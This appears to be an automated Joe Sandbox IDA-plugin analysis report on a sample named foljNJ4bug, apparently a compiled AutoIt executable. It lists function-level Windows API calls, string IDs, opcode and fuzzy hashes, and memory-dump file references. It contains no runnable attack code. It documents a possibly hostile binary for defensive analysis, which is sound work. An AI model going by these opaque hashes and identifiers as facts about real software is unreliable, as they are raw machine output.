                                                                                                                                              • String ID: '
                                                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                                                              • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                              • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                                              • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                              • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                                              APIs
                                                                                                                                              • _strlen.LIBCMT ref: 0040F858
                                                                                                                                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                                                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                                                              • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove$_sprintf_strlen
                                                                                                                                              • String ID: %02X
                                                                                                                                              • API String ID: 1921645428-436463671
                                                                                                                                              • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                              • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                                                              • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                              • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID: Combobox
                                                                                                                                              • API String ID: 3850602802-2096851135
                                                                                                                                              • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                              • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                                              • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                              • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                                              APIs
                                                                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                                                                              • String ID: edit
                                                                                                                                              • API String ID: 2978978980-2167791130
                                                                                                                                              • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                              • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                                              • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                              • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                                              • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                              • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                                              • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                              • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: htonsinet_addr
                                                                                                                                              • String ID: 255.255.255.255
                                                                                                                                              • API String ID: 3832099526-2422070025
                                                                                                                                              • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                              • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                                              • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                              • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                                              APIs
                                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InternetOpen
                                                                                                                                              • String ID: <local>
                                                                                                                                              • API String ID: 2038078732-4266983199
                                                                                                                                              • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                              • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                                              • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                              • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __fread_nolock_memmove
                                                                                                                                              • String ID: EA06
                                                                                                                                              • API String ID: 1988441806-3962188686
                                                                                                                                              • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                                              • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                                                              • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                                              • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove
                                                                                                                                              • String ID: u,D
                                                                                                                                              • API String ID: 4104443479-3858472334
                                                                                                                                              • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                              • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                                                              • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                              • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                                                              APIs
                                                                                                                                              • _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • _memmove.LIBCMT ref: 00401B57
                                                                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                                                              • String ID: @EXITCODE
                                                                                                                                              • API String ID: 2734553683-3436989551
                                                                                                                                              • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                                              • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                                                              • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                                                                                                              • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • wsprintfW.USER32 ref: 0045612A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend_mallocwsprintf
                                                                                                                                              • String ID: %d/%02d/%02d
                                                                                                                                              • API String ID: 1262938277-328681919
                                                                                                                                              • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                                              • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                                              • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                                                              • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                                                              APIs
                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                                              • InternetCloseHandle.WININET ref: 00442668
                                                                                                                                                • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                                              • String ID: aeB
                                                                                                                                              • API String ID: 857135153-906807131
                                                                                                                                              • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                              • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                                              • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                              • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                                              APIs
                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                                              • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                              • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                              • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                                              • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                              • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                                                              APIs
                                                                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                                                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                                                              • String ID: Shell_TrayWnd
                                                                                                                                              • API String ID: 529655941-2988720461
                                                                                                                                              • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                              • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                                              • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                                              • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                                              APIs
                                                                                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                                                • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message_doexit
                                                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                                                              • API String ID: 1993061046-4017498283
                                                                                                                                              • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                                              • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                                              • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
